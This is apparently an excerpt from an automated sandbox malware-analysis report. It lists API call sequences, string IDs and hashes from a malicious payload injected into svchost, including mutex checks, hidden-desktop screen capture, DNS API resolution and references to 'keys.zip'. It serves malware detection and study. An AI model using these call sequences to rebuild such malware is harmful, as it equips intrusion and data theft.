                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A70
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C92A79
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C92A91
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C92AA3
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C92AAE
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf8b2,VEFK), ref: 02C92AC8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bf8b2$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0#v$VEFK
                                                                                                                                                                                                                    • API String ID: 849374196-3775063419
                                                                                                                                                                                                                    • Opcode ID: b80cf928594d81234f7e93009e373ef2cb61e057972e65856da3ba67c5e8679a
                                                                                                                                                                                                                    • Instruction ID: cf5307aaa716208c13d45688a6128ea76d6d682987b08c38524c8f77d182b2d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80cf928594d81234f7e93009e373ef2cb61e057972e65856da3ba67c5e8679a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6901FE32EC57543BFB22A7619C0DF5A778CAF44B20F044658FD8597181DFB0951046EB
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9AC
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8D9C2
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9D0
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8D9D9
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8D9F1
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8DA03
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfd65), ref: 02C8DA0E
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfd65,CRAIF), ref: 02C8DA28
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfd65$CRAIF$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0#v
                                                                                                                                                                                                                    • API String ID: 849374196-2439100428
                                                                                                                                                                                                                    • Opcode ID: bece56cc50f7c0badeb0bb4b249e25c43607e4c03d99266cf82caa41d85d5bc1
                                                                                                                                                                                                                    • Instruction ID: 104e8e4c2d7b88b54f5b5cd2b4d18fb869c1bcacf3b05097bf7c6afeb6e5f25f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bece56cc50f7c0badeb0bb4b249e25c43607e4c03d99266cf82caa41d85d5bc1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F401D632EC47547AF312A7B15C0AF5A738CAF44B28F158664F909A31C1DBB499008AA6
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C75940
                                                                                                                                                                                                                    • DnsFlushResolverCache.DNSAPI ref: 02C7594A
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75AF7390), ref: 02C7595A
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02C75973
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02C7598F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02C759AB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02C759C7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                                    • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                                    • API String ID: 2466897691-3547598143
                                                                                                                                                                                                                    • Opcode ID: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
                                                                                                                                                                                                                    • Instruction ID: 8eefb0f407ac36fa6f6afb46c2e1072f14246f73863aaabdf619568f93586068
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74018671BC435676B91231751C0AF4B972E4EC0ED5F9206B4FC12F2444DB96E20388B8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 02C7B9ED
                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 02C7B9FC
                                                                                                                                                                                                                      • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 02C7BA39
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
                                                                                                                                                                                                                    • PrintWindow.USER32(00000000,?,00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7BA55
                                                                                                                                                                                                                    • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,762330D0,?,?,?,02C7843E), ref: 02C7BA7B
                                                                                                                                                                                                                    • CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
                                                                                                                                                                                                                    • GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
                                                                                                                                                                                                                    • OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
                                                                                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
                                                                                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 02C7BAF2
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 02C7BAF5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3597830993-0
                                                                                                                                                                                                                    • Opcode ID: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
                                                                                                                                                                                                                    • Instruction ID: e0fbb222fdb7a689cd4738f8298ab91a3c5c0875cd4c5c97c898b7d6531adc1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4315E71E80114AFD715EBA5DC89FBF7BB8EF89B14F104648FA01A3180DB74AD118A70
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C7CAA8
                                                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: GetComputerNameA.KERNEL32(02CBD6A8,?), ref: 02C7CA07
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: lstrlenA.KERNEL32(02CBD6A8,?,?,02C861D1), ref: 02C7CA12
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA52
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA62
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA72
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA7F
                                                                                                                                                                                                                      • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA8C
                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: SetThreadDesktop.USER32(?,7622F590,762216B0,00000000), ref: 02C780BF
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDC.USER32(00000000), ref: 02C780C7
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: DeleteObject.GDI32(00000000), ref: 02C78155
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
                                                                                                                                                                                                                      • Part of subcall function 02C780B0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,02CBD6FC,?,?,02C77262,00000000,00000000), ref: 02C7CBD4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create$wsprintf$EventFile$Mutex$BitsCapsDeviceHeapMappingView$BitmapCompatibleComputerCountDeleteDesktopFreeNameObjectReleaseThreadTicklstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2940656088-0
                                                                                                                                                                                                                    • Opcode ID: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
                                                                                                                                                                                                                    • Instruction ID: 7143cfbcd07b478516294d572ce1f76d00f89f23f1645128c4751ac3e455c077
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37315870FC47067AFA625B799C43F552A98AB84F11F240A67B705FE1C1DAE0E2108A69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41,?,7693BF00), ref: 02C8F8A0
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8F8E1
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,7693BF00), ref: 02C8F8EB
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F8F3
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F904
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,7693BF00), ref: 02C8F90B
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,7693BF00), ref: 02C8F918
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41,?,?,?,7693BF00), ref: 02C8F987
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BFF41$keys.zip$path1.txt
                                                                                                                                                                                                                    • API String ID: 1373881290-2169523781
                                                                                                                                                                                                                    • Opcode ID: bbaf34f06708c7ce2f5536714c3757120cb9e9ddce496b7b0d81e9858fbe9e24
                                                                                                                                                                                                                    • Instruction ID: 29d7d588c098d824c285a5ef575a4294df5b1a72b2e407bb19de8d166829a7dc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbaf34f06708c7ce2f5536714c3757120cb9e9ddce496b7b0d81e9858fbe9e24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E415B315002455FCB16DF2498A87E7BBE9EF85304F54C5E8D9C9C7600EB70DA49C790
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C921B0
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C921FB
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C92203
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C9221B
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B,?,02C923DC), ref: 02C92297
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BF93B$keys.zip$path1.txt
                                                                                                                                                                                                                    • API String ID: 1373881290-3210755562
                                                                                                                                                                                                                    • Opcode ID: 6f836b25f17f0ad99ec8f96c18d87b5cd4d00b462bd525bbeac384eb34f090cc
                                                                                                                                                                                                                    • Instruction ID: af73b95f3afc7f7d0884e6785d3ddf53a614609f7025e591714c5bd7d1cea629
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f836b25f17f0ad99ec8f96c18d87b5cd4d00b462bd525bbeac384eb34f090cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D4114719046455FCF168B24AC9CBEABBE9EF85300F148694EDC9C7201EB71CA58CB91
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A8C3
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7A8F0
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7A8F7
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7A909
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7A918
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7A922
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A934
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7A961
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7A968
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000215,00000000,?), ref: 02C7A97B
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2596333622-3387790918
                                                                                                                                                                                                                    • Opcode ID: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
                                                                                                                                                                                                                    • Instruction ID: 11d871deff8ae8ac6c3bb86cc3c047be6394bae5bf7a145b80572d6ccf4b0d3c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4621E231A80210AFC7028B65E84CFABBBA8FFD8721F054BB6F118C7251CB705561CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C736A1
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,7736C3F0,02C8599A), ref: 02C736B4
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C736C0
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C736ED
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,7736C3F0,02C8599A), ref: 02C736FA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C73706
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C73739
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCountHandleModuleProcTick$_snprintf
                                                                                                                                                                                                                    • String ID: %x%x$6b8e26743fcf62a2$RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 3150073801-94268103
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8A35B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C8A366
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfc59,ALPHA), ref: 02C8A380
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8A386
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfc59$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 4280258085-526467187
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C91905
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9192B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C91936
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7F1BF8F3,RFK), ref: 02C91950
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C91956
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7F1BF8F3$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RFK
                                                                                                                                                                                                                    • API String ID: 4280258085-2405295479
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E8F6
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfde3,HANDY), ref: 02C8E910
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8E916
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfde3$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v
                                                                                                                                                                                                                    • API String ID: 4280258085-2479272528
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$malloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2190258309-0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4b8308effba2e0fad6e10e14667dd85b0e6b556642bc1ce5fb5bbcfcda7619dd
                                                                                                                                                                                                                    • Instruction ID: e9425d0ca37bfb561863d8c25653af8c558fe77ebd5fc73c7aa99de3bacac200
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b8308effba2e0fad6e10e14667dd85b0e6b556642bc1ce5fb5bbcfcda7619dd
